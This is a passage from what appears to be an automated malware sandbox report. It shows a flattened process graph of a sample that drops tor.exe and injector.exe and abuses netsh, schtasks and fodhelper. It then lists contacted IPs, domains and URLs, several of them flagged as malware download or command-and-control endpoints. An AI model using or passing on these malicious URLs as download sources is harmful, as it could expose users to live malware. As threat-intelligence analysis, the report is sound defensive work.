conhost.exe 26->43         started        45 fodhelper.exe 28->45         started        53 3 other processes 28->53 55 4 other processes 30->55 47 powershell.exe 32->47         started        49 conhost.exe 34->49         started        signatures9 process10 dnsIp11 129 server5.duniadekho.bar 185.82.216.50 ITL-BG Bulgaria 36->129 131 stun4.l.google.com 74.125.204.127 GOOGLEUS United States 36->131 133 6 other IPs or domains 36->133 107 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 36->107 dropped 109 C:\Users\user\AppData\Local\Temp\...\tor.exe, PE32 36->109 dropped 111 C:\Users\user\AppData\...\tor-gencert.exe, PE32 36->111 dropped 113 16 other files (10 malicious) 36->113 dropped 151 Multi AV Scanner detection for dropped file 36->151 153 Detected unpacking (changes PE section rights) 36->153 155 Uses shutdown.exe to shutdown or reboot the system 36->155 157 Uses schtasks.exe or at.exe to add and modify task schedules 36->157 57 injector.exe 36->57         started        60 cmd.exe 36->60         started        72 13 other processes 36->72 159 Uses netsh to modify the Windows network and firewall settings 41->159 62 netsh.exe 2 41->62         started        64 conhost.exe 41->64         started        161 Drops executables to the windows directory (C:\Windows) and starts them 45->161 66 csrss.exe 45->66         started        68 conhost.exe 47->68         started        75 3 other processes 51->75 70 csrss.exe 55->70         started        file12 signatures13 process14 dnsIp15 165 Antivirus detection for dropped file 57->165 167 Multi AV Scanner detection for dropped file 57->167 77 conhost.exe 57->77         started        91 2 other processes 60->91 169 Creates files in the system32 config directory 62->169 79 csrss.exe 66->79         started        81 powershell.exe 66->81         started        83 csrss.exe 70->83         started        85 powershell.exe 70->85         started        135 77.111.247.137 HERNLABSNL Norway 72->135 137 api.sec-tunnel.com 77.111.247.15 HERNLABSNL Norway 72->137 87 conhost.exe 72->87         started        89 conhost.exe 72->89         started        93 11 other processes 72->93 signatures16 process17 process18 95 powershell.exe 79->95         started        97 conhost.exe 81->97         started        99 powershell.exe 83->99         started        101 conhost.exe 85->101         started        process19 103 conhost.exe 95->103         started        105 conhost.exe 99->105         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.168.112
 twopixis.com United States
13335 CLOUDFLARENETUS false
77.68.94.106
 unknown United Kingdom
8560 ONEANDONE-ASBrauerstrasse48DE false
140.82.121.3
 github.com United States
36459 GITHUBUS false
62.210.99.238
 unknown France
12876 OnlineSASFR false
185.82.216.50
 server5.duniadekho.bar Bulgaria
59729 ITL-BG false
147.135.65.26
 unknown United States
16276 OVHFR false
74.125.204.127
 stun4.l.google.com United States
15169 GOOGLEUS false
51.159.136.111
 unknown France
12876 OnlineSASFR false
158.69.205.247
 unknown Canada
16276 OVHFR false
104.21.54.103
 unknown United States
13335 CLOUDFLARENETUS false
77.111.247.15
 api.sec-tunnel.com Norway
205016 HERNLABSNL false
185.199.110.133
 objects.githubusercontent.com Netherlands
54113 FASTLYUS false
77.111.247.137
 unknown Norway
205016 HERNLABSNL false
162.159.134.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
stun4.l.google.com 74.125.204.127 true
twopixis.com 172.67.168.112 true
server5.duniadekho.bar 185.82.216.50 true
github.com 140.82.121.3 true
stun.stunprotocol.org 127.0.0.1 true
cdn.discordapp.com 162.159.134.233 true
api.sec-tunnel.com 77.111.247.15 true
objects.githubusercontent.com 185.199.110.133 true
ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://cdn.discordapp.com/attachments/1087398815188910163/1087399133926674453/LZ.zip false
    		high
    https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e true
    • Avira URL Cloud: malware
    		 unknown
    https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe false
      		high
      https://twopixis.com/w/w-8-debug.exe false
      • Avira URL Cloud: malware
      		 unknown
      https://twopixis.com/watchdog/watchdog.exe false
      • Avira URL Cloud: malware
      		 unknown
      https://server5.duniadekho.bar/api/poll true
      • Avira URL Cloud: malware
      		 unknown
      https://twopixis.com/wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe false
      • Avira URL Cloud: malware
      		 unknown
      https://server5.duniadekho.bar/api/restriction-us true
      • Avira URL Cloud: malware
      		 unknown
      https://twopixis.com/smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe false
      • Avira URL Cloud: malware
      		 unknown
      https://twopixis.com/gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe false
      • Avira URL Cloud: malware
      		 unknown
      https://api.sec-tunnel.com/v4/register_subscriber false
      • Avira URL Cloud: safe
      		 unknown
      https://api.sec-tunnel.com/v4/register_device false
      • Avira URL Cloud: safe
      		 unknown
      https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 true
      • Avira URL Cloud: malware
      		 unknown
      https://api.sec-tunnel.com/v4/discover false
      • Avira URL Cloud: safe
      		 unknown